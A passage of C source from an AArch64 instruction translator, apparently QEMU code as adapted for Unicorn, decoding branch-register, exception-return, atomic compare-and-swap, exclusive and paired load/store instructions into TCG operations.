= new_tmp_a64_zero(s); } if (s->pauth_active) { dst = new_tmp_a64(s); if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } } else { dst = cpu_reg(s, rn); } break; default: goto do_unallocated; } gen_a64_set_pc(s, dst); /* BLR also needs to load return address */ if (opc == 1) { tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } break; case 8: /* BRAA */ case 9: /* BLRAA */ if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if ((op3 & ~1) != 2) { goto do_unallocated; } btype_mod = opc & 1; if (s->pauth_active) { dst = new_tmp_a64(s); modifier = cpu_reg_sp(s, op4); if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, cpu_reg(s, rn), modifier); } } else { dst = cpu_reg(s, rn); } gen_a64_set_pc(s, dst); /* BLRAA also needs to load return address */ if (opc == 9) { tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } break; case 4: /* ERET */ if (s->current_el == 0) { goto do_unallocated; } switch (op3) { case 0: /* ERET */ if (op4 != 0) { goto do_unallocated; } dst = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offsetof(CPUARMState, elr_el[s->current_el])); break; case 2: /* ERETAA */ case 3: /* ERETAB */ if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if (rn != 0x1f || op4 != 0x1f) { goto do_unallocated; } dst = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, dst, tcg_ctx->cpu_env, offsetof(CPUARMState, elr_el[s->current_el])); if (s->pauth_active) { modifier = tcg_ctx->cpu_X[31]; if (op3 == 2) { gen_helper_autia(tcg_ctx, dst, tcg_ctx->cpu_env, dst, modifier); } else { gen_helper_autib(tcg_ctx, dst, tcg_ctx->cpu_env, dst, modifier); } } break; default: goto do_unallocated; } gen_helper_exception_return(tcg_ctx, tcg_ctx->cpu_env, dst); tcg_temp_free_i64(tcg_ctx, dst); /* Must exit loop to check un-masked IRQs */ s->base.is_jmp = DISAS_EXIT; return; case 5: /* DRPS */ if (op3 != 0 || op4 != 0 || rn != 0x1f) { goto do_unallocated; } else { unsupported_encoding(s, insn); } return; default: do_unallocated: unallocated_encoding(s); return; } switch (btype_mod) { case 0: /* BR */ if (dc_isar_feature(aa64_bti, s)) { /* BR to {x16,x17} or !guard -> 1, else 3. */ set_btype(s, rn == 16 || rn == 17 || !s->guarded_page ? 1 : 3); } break; case 1: /* BLR */ if (dc_isar_feature(aa64_bti, s)) { /* BLR sets BTYPE to 2, regardless of source guarded page. */ set_btype(s, 2); } break; default: /* RET or none of the above. */ /* BTYPE will be set to 0 by normal end-of-insn processing. */ break; } s->base.is_jmp = DISAS_JUMP; } /* Branches, exception generating and system instructions */ static void disas_b_exc_sys(DisasContext *s, uint32_t insn) { switch (extract32(insn, 25, 7)) { case 0x0a: case 0x0b: case 0x4a: case 0x4b: /* Unconditional branch (immediate) */ disas_uncond_b_imm(s, insn); break; case 0x1a: case 0x5a: /* Compare & branch (immediate) */ disas_comp_b_imm(s, insn); break; case 0x1b: case 0x5b: /* Test & branch (immediate) */ disas_test_b_imm(s, insn); break; case 0x2a: /* Conditional branch (immediate) */ disas_cond_b_imm(s, insn); break; case 0x6a: /* Exception generation / System */ if (insn & (1 << 24)) { if (extract32(insn, 22, 2) == 0) { disas_system(s, insn); } else { unallocated_encoding(s); } } else { disas_exc(s, insn); } break; case 0x6b: /* Unconditional branch (register) */ disas_uncond_b_reg(s, insn); break; default: unallocated_encoding(s); break; } } /* * Load/Store exclusive instructions are implemented by remembering * the value/address loaded, and seeing if these are the same * when the store is performed. This is not actually the architecturally * mandated semantics, but it works for typical guest code sequences * and avoids having to monitor regular stores. * * The store exclusive uses the atomic cmpxchg primitives to avoid * races in multi-threaded linux-user and when MTTCG softmmu is * enabled. */ static void gen_load_exclusive(DisasContext *s, int rt, int rt2, TCGv_i64 addr, int size, bool is_pair) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int idx = get_mem_index(s); MemOp memop = s->be_data; g_assert(size <= 3); if (is_pair) { g_assert(size >= 2); if (size == 2) { /* The pair must be single-copy atomic for the doubleword. */ memop |= MO_64 | MO_ALIGN; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop); if (s->be_data == MO_LE) { tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val, 0, 32); tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_val, 32, 32); } else { tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val, 32, 32); tcg_gen_extract_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_val, 0, 32); } } else { /* The pair must be single-copy atomic for *each* doubleword, not the entire quadword, however it must be quadword aligned. */ memop |= MO_64; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop | MO_ALIGN_16); TCGv_i64 addr2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_addi_i64(tcg_ctx, addr2, addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_high, addr2, idx, memop); tcg_temp_free_i64(tcg_ctx, addr2); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt2), tcg_ctx->cpu_exclusive_high); } } else { memop |= size | MO_ALIGN; tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, addr, idx, memop); tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rt), tcg_ctx->cpu_exclusive_val); } tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr); } static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2, TCGv_i64 addr, int size, int is_pair) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* if (env->exclusive_addr == addr && env->exclusive_val == [addr] * && (!is_pair || env->exclusive_high == [addr + datasize])) { * [addr] = {Rt}; * if (is_pair) { * [addr + datasize] = {Rt2}; * } * {Rd} = 0; * } else { * {Rd} = 1; * } * env->exclusive_addr = -1; */ TCGLabel *fail_label = gen_new_label(tcg_ctx); TCGLabel *done_label = gen_new_label(tcg_ctx); TCGv_i64 tmp; tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, addr, tcg_ctx->cpu_exclusive_addr, fail_label); tmp = tcg_temp_new_i64(tcg_ctx); if (is_pair) { if (size == 2) { if (s->be_data == MO_LE) { tcg_gen_concat32_i64(tcg_ctx, tmp, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { tcg_gen_concat32_i64(tcg_ctx, tmp, cpu_reg(s, rt2), cpu_reg(s, rt)); } tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tmp, tcg_ctx->cpu_exclusive_addr, tcg_ctx->cpu_exclusive_val, tmp, get_mem_index(s), MO_64 | MO_ALIGN | s->be_data); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, tmp, tmp, tcg_ctx->cpu_exclusive_val); } else if (tb_cflags(s->base.tb) & CF_PARALLEL) { if (!HAVE_CMPXCHG128) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } else if (s->be_data == MO_LE) { gen_helper_paired_cmpxchg64_le_parallel(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { gen_helper_paired_cmpxchg64_be_parallel(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } } else if (s->be_data == MO_LE) { gen_helper_paired_cmpxchg64_le(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } else { gen_helper_paired_cmpxchg64_be(tcg_ctx, tmp, tcg_ctx->cpu_env, tcg_ctx->cpu_exclusive_addr, cpu_reg(s, rt), cpu_reg(s, rt2)); } } else { tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tmp, tcg_ctx->cpu_exclusive_addr, tcg_ctx->cpu_exclusive_val, cpu_reg(s, rt), get_mem_index(s), size | MO_ALIGN | s->be_data); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, tmp, tmp, tcg_ctx->cpu_exclusive_val); } tcg_gen_mov_i64(tcg_ctx, cpu_reg(s, rd), tmp); tcg_temp_free_i64(tcg_ctx, tmp); tcg_gen_br(tcg_ctx, done_label); gen_set_label(tcg_ctx, fail_label); tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), 1); gen_set_label(tcg_ctx, done_label); tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } static void gen_compare_and_swap(DisasContext *s, int rs, int rt, int rn, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rs = cpu_reg(s, rs); TCGv_i64 tcg_rt = cpu_reg(s, rt); int memidx = get_mem_index(s); TCGv_i64 clean_addr; if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, tcg_rs, clean_addr, tcg_rs, tcg_rt, memidx, size | MO_ALIGN | s->be_data); } static void gen_compare_and_swap_pair(DisasContext *s, int rs, int rt, int rn, int size) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 s1 = cpu_reg(s, rs); TCGv_i64 s2 = cpu_reg(s, rs + 1); TCGv_i64 t1 = cpu_reg(s, rt); TCGv_i64 t2 = cpu_reg(s, rt + 1); TCGv_i64 clean_addr; int memidx = get_mem_index(s); if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); if (size == 2) { TCGv_i64 cmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 val = tcg_temp_new_i64(tcg_ctx); if (s->be_data == MO_LE) { tcg_gen_concat32_i64(tcg_ctx, val, t1, t2); tcg_gen_concat32_i64(tcg_ctx, cmp, s1, s2); } else { tcg_gen_concat32_i64(tcg_ctx, val, t2, t1); tcg_gen_concat32_i64(tcg_ctx, cmp, s2, s1); } tcg_gen_atomic_cmpxchg_i64(tcg_ctx, cmp, clean_addr, cmp, val, memidx, MO_64 | MO_ALIGN | s->be_data); tcg_temp_free_i64(tcg_ctx, val); if (s->be_data == MO_LE) { tcg_gen_extr32_i64(tcg_ctx, s1, s2, cmp); } else { tcg_gen_extr32_i64(tcg_ctx, s2, s1, cmp); } tcg_temp_free_i64(tcg_ctx, cmp); } else if (tb_cflags(s->base.tb) & CF_PARALLEL) { if (HAVE_CMPXCHG128) { TCGv_i32 tcg_rs = tcg_const_i32(tcg_ctx, rs); if (s->be_data == MO_LE) { gen_helper_casp_le_parallel(tcg_ctx, tcg_ctx->cpu_env, tcg_rs, clean_addr, t1, t2); } else { gen_helper_casp_be_parallel(tcg_ctx, tcg_ctx->cpu_env, tcg_rs, clean_addr, t1, t2); } tcg_temp_free_i32(tcg_ctx, tcg_rs); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } } else { TCGv_i64 d1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 d2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 a2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 c2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 zero = tcg_const_i64(tcg_ctx, 0); /* Load the two words, in memory order. */ tcg_gen_qemu_ld_i64(tcg_ctx, d1, clean_addr, memidx, MO_64 | MO_ALIGN_16 | s->be_data); tcg_gen_addi_i64(tcg_ctx, a2, clean_addr, 8); tcg_gen_qemu_ld_i64(tcg_ctx, d2, a2, memidx, MO_64 | s->be_data); /* Compare the two words, also in memory order. */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_EQ, c1, d1, s1); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_EQ, c2, d2, s2); tcg_gen_and_i64(tcg_ctx, c2, c2, c1); /* If compare equal, write back new data, else write back old data. */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, c1, c2, zero, t1, d1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, c2, c2, zero, t2, d2); tcg_gen_qemu_st_i64(tcg_ctx, c1, clean_addr, memidx, MO_64 | s->be_data); tcg_gen_qemu_st_i64(tcg_ctx, c2, a2, memidx, MO_64 | s->be_data); tcg_temp_free_i64(tcg_ctx, a2); tcg_temp_free_i64(tcg_ctx, c1); tcg_temp_free_i64(tcg_ctx, c2); tcg_temp_free_i64(tcg_ctx, zero); /* Write back the data from memory to Rs. */ tcg_gen_mov_i64(tcg_ctx, s1, d1); tcg_gen_mov_i64(tcg_ctx, s2, d2); tcg_temp_free_i64(tcg_ctx, d1); tcg_temp_free_i64(tcg_ctx, d2); } } /* Update the Sixty-Four bit (SF) registersize. This logic is derived * from the ARMv8 specs for LDR (Shared decode for all encodings). */ static bool disas_ldst_compute_iss_sf(int size, bool is_signed, int opc) { int opc0 = extract32(opc, 0, 1); int regsize; if (is_signed) { regsize = opc0 ? 32 : 64; } else { regsize = size == 3 ? 64 : 32; } return regsize == 64; } /* Load/store exclusive * * 31 30 29 24 23 22 21 20 16 15 14 10 9 5 4 0 * +-----+-------------+----+---+----+------+----+-------+------+------+ * | sz | 0 0 1 0 0 0 | o2 | L | o1 | Rs | o0 | Rt2 | Rn | Rt | * +-----+-------------+----+---+----+------+----+-------+------+------+ * * sz: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64 bit * L: 0 -> store, 1 -> load * o2: 0 -> exclusive, 1 -> not * o1: 0 -> single register, 1 -> register pair * o0: 1 -> load-acquire/store-release, 0 -> not */ static void disas_ldst_excl(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rt2 = extract32(insn, 10, 5); int rs = extract32(insn, 16, 5); int is_lasr = extract32(insn, 15, 1); int o2_L_o1_o0 = extract32(insn, 21, 3) * 2 | is_lasr; int size = extract32(insn, 30, 2); TCGv_i64 clean_addr; switch (o2_L_o1_o0) { case 0x0: /* STXR */ case 0x1: /* STLXR */ if (rn == 31) { gen_check_sp_alignment(s); } if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); gen_store_exclusive(s, rs, rt, rt2, clean_addr, size, false); return; case 0x4: /* LDXR */ case 0x5: /* LDAXR */ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); s->is_ldex = true; gen_load_exclusive(s, rt, rt2, clean_addr, size, false); if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return; case 0x8: /* STLLR */ if (!dc_isar_feature(aa64_lor, s)) { break; } /* StoreLORelease is the same as Store-Release for QEMU. */ /* fall through */ case 0x9: /* STLR */ /* Generate ISS for non-exclusive accesses including LASR. */ if (rn == 31) { gen_check_sp_alignment(s); } tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); do_gpr_st(s, cpu_reg(s, rt), clean_addr, size, true, rt, disas_ldst_compute_iss_sf(size, false, 0), is_lasr); return; case 0xc: /* LDLAR */ if (!dc_isar_feature(aa64_lor, s)) { break; } /* LoadLOAcquire is the same as Load-Acquire for QEMU. */ /* fall through */ case 0xd: /* LDAR */ /* Generate ISS for non-exclusive accesses including LASR. */ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); do_gpr_ld(s, cpu_reg(s, rt), clean_addr, size, false, false, true, rt, disas_ldst_compute_iss_sf(size, false, 0), is_lasr); tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); return; case 0x2: case 0x3: /* CASP / STXP */ if (size & 2) { /* STXP / STLXP */ if (rn == 31) { gen_check_sp_alignment(s); } if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); gen_store_exclusive(s, rs, rt, rt2, clean_addr, size, true); return; } if (rt2 == 31 && ((rt | rs) & 1) == 0 && dc_isar_feature(aa64_atomics, s)) { /* CASP / CASPL */ gen_compare_and_swap_pair(s, rs, rt, rn, size | 2); return; } break; case 0x6: case 0x7: /* CASPA / LDXP */ if (size & 2) { /* LDXP / LDAXP */ if (rn == 31) { gen_check_sp_alignment(s); } clean_addr = clean_data_tbi(s, cpu_reg_sp(s, rn)); s->is_ldex = true; gen_load_exclusive(s, rt, rt2, clean_addr, size, true); if (is_lasr) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } return; } if (rt2 == 31 && ((rt | rs) & 1) == 0 && dc_isar_feature(aa64_atomics, s)) { /* CASPA / CASPAL */ gen_compare_and_swap_pair(s, rs, rt, rn, size | 2); return; } break; case 0xa: /* CAS */ case 0xb: /* CASL */ case 0xe: /* CASA */ case 0xf: /* CASAL */ if (rt2 == 31 && dc_isar_feature(aa64_atomics, s)) { gen_compare_and_swap(s, rs, rt, rn, size); return; } break; } unallocated_encoding(s); } /* * Load register (literal) * * 31 30 29 27 26 25 24 23 5 4 0 * +-----+-------+---+-----+-------------------+-------+ * | opc | 0 1 1 | V | 0 0 | imm19 | Rt | * +-----+-------+---+-----+-------------------+-------+ * * V: 1 -> vector (simd/fp) * opc (non-vector): 00 -> 32 bit, 01 -> 64 bit, * 10-> 32 bit signed, 11 -> prefetch * opc (vector): 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit (11 unallocated) */ static void disas_ld_lit(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int64_t imm = sextract32(insn, 5, 19) << 2; bool is_vector = extract32(insn, 26, 1); int opc = extract32(insn, 30, 2); bool is_signed = false; int size = 2; TCGv_i64 tcg_rt, clean_addr; if (is_vector) { if (opc == 3) { unallocated_encoding(s); return; } size = 2 + opc; if (!fp_access_check(s)) { return; } } else { if (opc == 3) { /* PRFM (literal) : prefetch */ return; } size = 2 + extract32(opc, 0, 1); is_signed = extract32(opc, 1, 1); } tcg_rt = cpu_reg(s, rt); clean_addr = tcg_const_i64(tcg_ctx, s->pc_curr + imm); if (is_vector) { do_fp_ld(s, rt, clean_addr, size); } else { /* Only unsigned 32bit loads target 32bit registers. */ bool iss_sf = opc != 0; do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, false, true, rt, iss_sf, false); } tcg_temp_free_i64(tcg_ctx, clean_addr); } /* * LDNP (Load Pair - non-temporal hint) * LDP (Load Pair - non vector) * LDPSW (Load Pair Signed Word - non vector) * STNP (Store Pair - non-temporal hint) * STP (Store Pair - non vector) * LDNP (Load Pair of SIMD&FP - non-temporal hint) * LDP (Load Pair of SIMD&FP) * STNP (Store Pair of SIMD&FP - non-temporal hint) * STP (Store Pair of SIMD&FP) * * 31 30 29 27 26 25 24 23 22 21 15 14 10 9 5 4 0 * +-----+-------+---+---+-------+---+-----------------------------+ * | opc | 1 0 1 | V | 0 | index | L | imm7 | Rt2 | Rn | Rt | * +-----+-------+---+---+-------+---+-------+-------+------+------+ * * opc: LDP/STP/LDNP/STNP 00 -> 32 bit, 10 -> 64 bit * LDPSW 01 * LDP/STP/LDNP/STNP (SIMD) 00 -> 32 bit, 01 -> 64 bit, 10 -> 128 bit * V: 0 -> GPR, 1 -> Vector * idx: 00 -> signed offset with non-temporal hint, 01 -> post-index, * 10 -> signed offset, 11 -> pre-index * L: 0 -> Store 1 -> Load * * Rt, Rt2 = GPR or SIMD registers to be stored * Rn = general purpose register containing address * imm7 = signed offset (multiple of 4 or 8 depending on size) */ static void disas_ldst_pair(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rt = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rt2 = extract32(insn, 10, 5); uint64_t offset = sextract64(insn, 15, 7); int index = extract32(insn, 23, 2); bool is_vector = extract32(insn, 26, 1); bool is_load = extract32(insn, 22, 1); int opc = extract32(insn, 30, 2); bool is_signed = false; bool postindex = false; bool wback = false; TCGv_i64 clean_addr, dirty_addr; int size; if (opc == 3) { unallocated_encoding(s); return; } if (is_vector) { size = 2 + opc; } else { size = 2 + extract32(opc, 1, 1); is_signed = extract32(opc, 0, 1); if (!is_load && is_signed) { unallocated_encoding(s); return; } } switch (index) { case 1: /* post-index */ postindex = true; wback = true; break; case 0: /* signed offset with "non-temporal" hint. Since we don't emulate * caches we don't care about hints to the cache system about * data access patterns, and handle this identically to plain * signed offset. */ if (is_signed) { /* There is no non-temporal-hint version of LDPSW */ unallocated_encoding(s); return; } postindex = false; break; case 2: /* signed offset, rn not updated */ postindex = false; break; case 3: /* pre-index */ postindex = false; wback = true; break; } if (is_vector && !fp_access_check(s)) { return; } offset <<= size; if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (!postindex) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); } clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_load) { do_fp_ld(s, rt, clean_addr, size); } else { do_fp_st(s, rt, clean_addr, size); } tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); if (is_load) { do_fp_ld(s, rt2, clean_addr, size); } else { do_fp_st(s, rt2, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); TCGv_i64 tcg_rt2 = cpu_reg(s, rt2); if (is_load) { TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); /* Do not modify tcg_rt before recognizing any exception * from the second load. */ do_gpr_ld(s, tmp, clean_addr, size, is_signed, false, false, 0, false, false); tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); do_gpr_ld(s, tcg_rt2, clean_addr, size, is_signed, false, false, 0, false, false); tcg_gen_mov_i64(tcg_ctx, tcg_rt, tmp); tcg_temp_free_i64(tcg_ctx, tmp); } else { do_gpr_st(s, tcg_rt, clean_addr, size, false, 0, false, false); tcg_gen_addi_i64(tcg_ctx, clean_addr, clean_addr, 1ULL << size); do_gpr_st(s, tcg_rt2, clean_addr, size, false, 0, false, false); } } if (wback) { if (postindex) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, offset); } tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), dirty_addr); } } /* * Load/store (immediate post-indexed) * Load/store (immediate pre-indexed) * Load/store (unscaled immediate) * * 31 30 29 27 26 25 24 23 22 21 20 12 11 10 9 5 4 0 * +----+-------+---+-----+-----+---+--------+-----+------+------+ * |size| 1 1 1 | V | 0 0 | opc | 0 | imm9 | idx | Rn | Rt | * +----+-------+---+-----+-----+---+--------+-----+------+------+ * * idx = 01 -> post-indexed, 11 pre-indexed, 00 unscaled imm. (no writeback) 10 -> unprivileged * V = 0 -> non-vector * size: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 */ static void disas_ldst_reg_imm9(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); int imm9 = sextract32(insn, 12, 9); int idx = extract32(insn, 10, 2); bool is_signed = false; bool is_store = false; bool is_extended = false; bool is_unpriv = (idx == 2); bool iss_valid = !is_vector; bool post_index; bool writeback; TCGv_i64 clean_addr, dirty_addr; if (is_vector) { size |= (opc & 2) << 1; if (size > 4 || is_unpriv) { unallocated_encoding(s); return; } is_store = ((opc & 1) == 0); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ if (idx != 0) { unallocated_encoding(s); return; } return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } switch (idx) { case 0: case 2: post_index = false; writeback = false; break; case 1: post_index = true; writeback = true; break; case 3: post_index = false; writeback = true; break; default: g_assert_not_reached(); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); if (!post_index) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, imm9); } clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); int memidx = is_unpriv ? get_a64_user_mem_index(s) : get_mem_index(s); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st_memidx(s, tcg_rt, clean_addr, size, memidx, iss_valid, rt, iss_sf, false); } else { do_gpr_ld_memidx(s, tcg_rt, clean_addr, size, is_signed, is_extended, memidx, iss_valid, rt, iss_sf, false); } } if (writeback) { TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); if (post_index) { tcg_gen_addi_i64(tcg_ctx, dirty_addr, dirty_addr, imm9); } tcg_gen_mov_i64(tcg_ctx, tcg_rn, dirty_addr); } } /* * Load/store (register offset) * * 31 30 29 27 26 25 24 23 22 21 20 16 15 13 12 11 10 9 5 4 0 * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ * |size| 1 1 1 | V | 0 0 | opc | 1 | Rm | opt | S| 1 0 | Rn | Rt | * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ * * For non-vector: * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 * For vector: * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated * opc<0>: 0 -> store, 1 -> load * V: 1 -> vector/simd * opt: extend encoding (see DecodeRegExtend) * S: if S=1 then scale (essentially index by sizeof(size)) * Rt: register to transfer into/out of * Rn: address register or SP for base * Rm: offset register or ZR for offset */ static void disas_ldst_reg_roffset(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); int shift = extract32(insn, 12, 1); int rm = extract32(insn, 16, 5); int opt = extract32(insn, 13, 3); bool is_signed = false; bool is_store = false; bool is_extended = false; TCGv_i64 tcg_rm, clean_addr, dirty_addr; if (extract32(opt, 1, 1) == 0) { unallocated_encoding(s); return; } if (is_vector) { size |= (opc & 2) << 1; if (size > 4) { unallocated_encoding(s); return; } is_store = !extract32(opc, 0, 1); if (!fp_access_check(s)) { return; } } else { if (size == 3 && opc == 2) { /* PRFM - prefetch */ return; } if (opc == 3 && size > 1) { unallocated_encoding(s); return; } is_store = (opc == 0); is_signed = extract32(opc, 1, 1); is_extended = (size < 3) && extract32(opc, 0, 1); } if (rn == 31) { gen_check_sp_alignment(s); } dirty_addr = read_cpu_reg_sp(s, rn, 1); tcg_rm = read_cpu_reg(s, rm, 1); ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, opt, shift ? size : 0); tcg_gen_add_i64(tcg_ctx, dirty_addr, dirty_addr, tcg_rm); clean_addr = clean_data_tbi(s, dirty_addr); if (is_vector) { if (is_store) { do_fp_st(s, rt, clean_addr, size); } else { do_fp_ld(s, rt, clean_addr, size); } } else { TCGv_i64 tcg_rt = cpu_reg(s, rt); bool iss_sf = disas_ldst_compute_iss_sf(size, is_signed, opc); if (is_store) { do_gpr_st(s, tcg_rt, clean_addr, size, true, rt, iss_sf, false); } else { do_gpr_ld(s, tcg_rt, clean_addr, size, is_signed, is_extended, true, rt, iss_sf, false); } } } /* * Load/store (unsigned immediate) * * 31 30 29 27 26 25 24 23 22 21 10 9 5 * +----+-------+---+-----+-----+------------+-------+------+ * |size| 1 1 1 | V | 0 1 | opc | imm12 | Rn | Rt | * +----+-------+---+-----+-----+------------+-------+------+ * * For non-vector: * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 * For vector: * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated * opc<0>: 0 -> store, 1 -> load * Rn: base address register (inc SP) * Rt: target register */ static void disas_ldst_reg_unsigned_imm(DisasContext *s, uint32_t insn, int opc, int size, int rt, bool is_vector) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rn = extract32(insn, 5, 5); unsigned int imm12 = extract32(insn, 10, 12); unsigned int offset; TCGv_i64 clean_addr, dirty_addr; bool is_store; bool is_signed = false; bool is_extended = false; if (is_vector) { size |= (opc & 2) << 1; if 